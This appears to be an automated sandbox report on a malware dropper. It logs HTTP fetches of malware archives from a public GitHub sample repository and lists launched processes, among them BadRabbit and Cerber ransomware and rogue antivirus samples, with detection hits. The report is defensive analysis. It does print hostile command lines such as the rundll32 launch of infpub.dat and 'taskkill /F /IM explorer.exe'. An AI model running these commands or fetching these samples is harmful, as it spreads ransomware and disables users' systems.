                                                                                                                                                    2022-09-29 12:59:13 UTC17547INData Raw: 2a 24 79 89 58 d0 88 2c 76 d2 c6 95 64 4a ba a8 8d 12 16 a8 9a 09 b0 25 e7 19 5a 84 15 bc b2 cc 2c a4 14 c6 a7 ce ba 23 f4 b3 96 04 22 3a f2 d9 94 60 f2 2b 05 71 6c 35 0e 9d 19 ce ff 6a 5f e7 0e 6a 93 a0 9f d5 90 a4 e3 64 56 e1 1e 9d 87 0b 97 6d 3f 33 fd ea f2 5b 0e 31 81 43 5d 96 89 d8 fb 2e f7 b9 0b ae 74 e2 d3 0c ad 6d 90 4a a0 7f b1 e8 ad a0 20 16 64 ba a4 2c e4 d3 a9 03 ba 5e c9 7a f6 00 91 c2 56 e4 12 df 25 38 ed 7e 2e 98 0d c5 74 61 e6 e1 de b2 30 b1 00 44 97 f8 6a 41 f8 0b ab 50 a7 b5 a3 7d b6 0c ac dd 6f 23 4b 1a 4a d0 56 78 f1 0a 40 11 8b 5e b0 be b9 ab 26 42 79 fe 4b ec df 9a 09 3e 08 0d da 65 e7 05 41 ae 33 82 9e 23 ea f0 d8 f4 93 94 44 dc c2 e1 81 e8 dd 84 e3 b5 dd a9 79 e6 9c 62 49 cb 0a a4 14 22 58 bf ef 34 5b eb 7d 17 80 d4 ee 25 05 f1 74
                                                                                                                                                    Data Ascii: *$yX,vdJ%Z,#":`+ql5j_jdVm?3[1C].tmJ d,^zV%8~.ta0DjAP}o#KJVx@^&ByK>eA3#DybI"X4[}%t
                                                                                                                                                    2022-09-29 12:59:13 UTC17563INData Raw: 62 be 69 70 14 8f 0a 57 f9 a6 a4 fd ee 89 53 43 87 a2 62 a6 6a f1 e3 ce 7a 95 ad a4 19 fd 85 60 8b 46 eb c8 de cf 2b 81 2f 88 d6 4e 90 fc b2 f8 0e c0 5e 87 16 57 e5 5e cb 41 5a 25 e1 d9 8f c4 e5 14 d7 ae c5 93 32 77 23 05 ed cd 32 d6 22 76 6a c1 05 49 b9 d7 f9 83 7d 19 38 07 b8 89 a3 3b 14 26 61 ce 50 8a e0 2e 3a ad ae 3e 2b fa ec 26 37 fc 05 42 92 7b 54 df a5 97 cc 5b 0b 41 d7 de f1 11 ce 35 aa 82 09 08 71 79 63 1f aa 96 fa bd 13 56 11 5a dd 0b 39 b5 d0 48 16 9a 8a bc f9 7e 8c 34 a5 ca a3 51 d5 8e 76 96 a9 05 75 2c 2f 8d 37 6f 99 96 db 08 4f cd 22 97 3c 33 f5 bb f3 d6 e1 7e a0 ab 8b 84 10 16 b8 70 44 b1 28 01 1d 1f 5f 34 fe b7 c9 83 e2 a2 f5 01 e1 16 be fe 73 a6 d2 f4 3d 90 87 74 4a c3 7f 5a 81 8a 2b 67 78 ab 0b 8d 55 68 6f 6a 28 05 2d 2b 06 4b ae 40 ca
                                                                                                                                                    Data Ascii: bipWSCbjz`F+/N^W^AZ%2w#2"vjI}8;&aP.:>+&7B{T[A5qycVZ9H~4Qvu,/7oO"<3~pD(_4s=tJZ+gxUhoj(-+K@
                                                                                                                                                    2022-09-29 12:59:13 UTC17579INData Raw: ab 4d 5c f3 b4 71 04 a1 55 7f 97 cf 7d a3 01 9b 72 52 0b e4 61 27 f1 9b 25 be 73 a2 d9 a3 50 99 ef 92 1d de 0b ff c9 eb ef 22 ba 4f 55 36 b1 74 c9 26 5c 9f 8e 12 b4 8f 08 d9 7b 85 c1 34 93 0b e7 25 67 25 8b 82 92 62 e1 d9 ce 31 6c 1d 88 62 ed d8 5b a0 9c 9d b9 1e 9f 51 6f 62 cd 88 e6 de 74 61 d3 d4 52 ed 0e 3d 84 40 bf 34 9d a0 d6 08 da fd 75 e9 8b fb 8c 23 cc 33 1f bb b1 d0 92 33 06 a6 20 e9 49 7a 97 dd 1c ee 80 a0 40 d2 20 87 09 8a 7b c7 99 6c bf 14 7b 79 e6 af ed 1b 20 5b 26 5a 13 08 db 2a b6 50 4b 4a fb 64 d5 99 7d 13 8d 89 ba d3 a8 58 00 64 6c 6c 32 1c 5c 1e 47 83 f4 70 41 d5 34 d7 ad aa e2 59 ec 04 ba 7d 99 e3 7d fa 83 7a 8b 01 ab 6e 17 2b a5 cc c8 9f 1e e4 6d 17 c6 e2 0e 9c 9f ef b4 32 88 3e 23 cc 12 02 f1 fa ff 8d 18 45 a4 08 67 39 3b 81 93 f4 0d
                                                                                                                                                    Data Ascii: M\qU}rRa'%sP"OU6t&\{4%g%b1lb[QobtaR=@4u#33 Iz@ {l{y [&Z*PKJd}Xdll2\GpA4Y}}zn+m2>#Eg9;
                                                                                                                                                    2022-09-29 12:59:13 UTC17595INData Raw: 5d 5f b9 2c bf 4d 95 0c 04 1a c0 71 6c 14 4c c1 a3 12 52 a6 5c 0c 9f 55 7d aa e2 5b 61 53 55 43 b9 b8 4a 3e 3a bd 63 cf a9 8e 1b 20 2d ba 1c 0f 1e 8c 77 76 66 df fb 0b 24 fd ef bb 4c d4 4e f9 fd 9f 3d d0 50 6f ad 52 11 eb 56 f6 4a 74 3f 46 41 46 a7 0d 30 9b 19 8f 80 4a 22 40 61 b9 50 2a bb d2 e1 9b 41 f6 4c ce 0b 0b 0d 5a a8 4b 6f 19 a8 1f 3e 10 d0 03 c2 ea 05 2f 05 e8 a1 c8 2c ab 80 d8 c6 78 33 9e cc e6 9e 85 99 67 10 c6 d7 64 d5 a9 26 99 df 85 56 d1 de e2 07 bc 79 aa 00 41 16 25 bb c9 15 2d b9 44 a3 52 f7 ce 38 51 5e 60 0e b7 91 81 e5 11 6b ad a7 49 46 17 cc 5c 71 e9 db 0b 40 d2 17 0a d8 2c 88 07 cc 26 79 12 33 db 1a 0c 80 1f af 81 0a d8 07 21 2f cd fb 76 38 27 ee 9c 0d 4c c3 e0 ad 17 44 f8 0e fc af 63 c7 63 c5 2a c3 41 dd 40 cd 68 7a f2 8c 5e 9b c5 bc
                                                                                                                                                    Data Ascii: ]_,MqlLR\U}[aSUCJ>:c -wvf$LN=PoRVJt?FAF0J"@aP*ALZKo>/,x3gd&VyA%-DR8Q^`kIF\q@,&y3!/v8'LDcc*A@hz^


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    97192.168.2.349756140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:13 UTC17603OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    98140.82.121.3443192.168.2.349756C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:13 UTC17604INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:13 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/NavaShield.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:13 UTC17604INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    99192.168.2.349757185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:14 UTC17606OUTGET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:14:58:40
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\07bb0738.exe"
                                                                                                                                                    Imagebase:0x22e4ee30000
                                                                                                                                                    File size:153088 bytes
                                                                                                                                                    MD5 hash:E8583EE36603531BCF5001346C7474A7
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Reputation:low

                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:14:58:55
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:14:58:55
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:14:58:57
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:14:58:58
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:5
                                                                                                                                                    Start time:14:58:59
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:14:59:00
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                    Imagebase:0x7ff7c92c0000
                                                                                                                                                    File size:163336 bytes
                                                                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:7
                                                                                                                                                    Start time:14:59:01
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:9
                                                                                                                                                    Start time:14:59:02
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:10
                                                                                                                                                    Start time:14:59:03
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:11
                                                                                                                                                    Start time:14:59:08
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:12
                                                                                                                                                    Start time:14:59:22
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                    Imagebase:0x7ff651c80000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:13
                                                                                                                                                    Start time:14:59:27
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\07bb0738.exe"
                                                                                                                                                    Imagebase:0x1e767a80000
                                                                                                                                                    File size:153088 bytes
                                                                                                                                                    MD5 hash:E8583EE36603531BCF5001346C7474A7
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET

                                                                                                                                                    Target ID:14
                                                                                                                                                    Start time:14:59:27
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@Antivirus.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@Antivirus.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:2066944 bytes
                                                                                                                                                    MD5 hash:C7E9746B1B039B8BD1106BCA3038C38F
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 86%, ReversingLabs
                                                                                                                                                    • Detection: 60%, Metadefender, Browse

                                                                                                                                                    Target ID:15
                                                                                                                                                    Start time:14:59:30
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:757637 bytes
                                                                                                                                                    MD5 hash:382430DD7EAE8945921B7FEAB37ED36B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 78%, ReversingLabs
                                                                                                                                                    • Detection: 28%, Metadefender, Browse

                                                                                                                                                    Target ID:16
                                                                                                                                                    Start time:14:59:32
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:835669 bytes
                                                                                                                                                    MD5 hash:7DFBFBA1E4E64A946CB096BFC937FBAD
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                    • Detection: 64%, Metadefender, Browse

                                                                                                                                                    Target ID:17
                                                                                                                                                    Start time:14:59:37
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@AnViPC2009.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:1227610 bytes
                                                                                                                                                    MD5 hash:910DD666C83EFD3496F21F9F211CDC1F
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                                    • Detection: 24%, Metadefender, Browse

                                                                                                                                                    Target ID:18
                                                                                                                                                    Start time:14:59:38
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@BadRabbit.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@BadRabbit.exe"
                                                                                                                                                    Imagebase:0x1300000
                                                                                                                                                    File size:441899 bytes
                                                                                                                                                    MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 93%, ReversingLabs
                                                                                                                                                    • Detection: 83%, Metadefender, Browse

                                                                                                                                                    Target ID:19
                                                                                                                                                    Start time:14:59:38
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\302746537.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\WINDOWS\302746537.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:22528 bytes
                                                                                                                                                    MD5 hash:8703FF2E53C6FD3BC91294EF9204BACA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:20
                                                                                                                                                    Start time:14:59:39
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@Birele.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@Birele.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:119296 bytes
                                                                                                                                                    MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 86%, ReversingLabs
                                                                                                                                                    • Detection: 78%, Metadefender, Browse

                                                                                                                                                    Target ID:21
                                                                                                                                                    Start time:14:59:40
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:22
                                                                                                                                                    Start time:14:59:41
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                    Imagebase:0xc30000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000016.00000003.408744646.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, Author: Christiaan Beek

                                                                                                                                                    Target ID:23
                                                                                                                                                    Start time:14:59:42
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Endermanch@Cerber5.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:320760 bytes
                                                                                                                                                    MD5 hash:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: cerber3, Description: Cerber3 , Source: 00000017.00000000.387505023.0000000000448000.00000020.00000001.01000000.00000013.sdmp, Author: pekeinfo
                                                                                                                                                    • Rule: cerber3, Description: Cerber3 , Source: 00000017.00000000.390806743.0000000000448000.00000020.00000001.01000000.00000013.sdmp, Author: pekeinfo
                                                                                                                                                    • Rule: cerber3, Description: Cerber3 , Source: 00000017.00000000.383647145.0000000000448000.00000020.00000001.01000000.00000013.sdmp, Author: pekeinfo
                                                                                                                                                    • Rule: cerber3, Description: Cerber3 , Source: 00000017.00000000.392692750.0000000000448000.00000020.00000001.01000000.00000013.sdmp, Author: pekeinfo
                                                                                                                                                    • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 91%, ReversingLabs
                                                                                                                                                    • Detection: 76%, Metadefender, Browse

                                                                                                                                                    Target ID:24
                                                                                                                                                    Start time:14:59:43
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\A00.tmp\302746537.bat" "
                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:25
                                                                                                                                                    Start time:14:59:43
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff745070000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Target ID:26
                                                                                                                                                    Start time:14:59:43
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:9421312 bytes
                                                                                                                                                    MD5 hash:C18A7323332B3292A8E0F1C81DF65698
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 62%, ReversingLabs
                                                                                                                                                    • Detection: 56%, Metadefender, Browse

                                                                                                                                                    Target ID:27
                                                                                                                                                    Start time:14:59:43
                                                                                                                                                    Start date:29/09/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:taskkill /F /IM explorer.exe
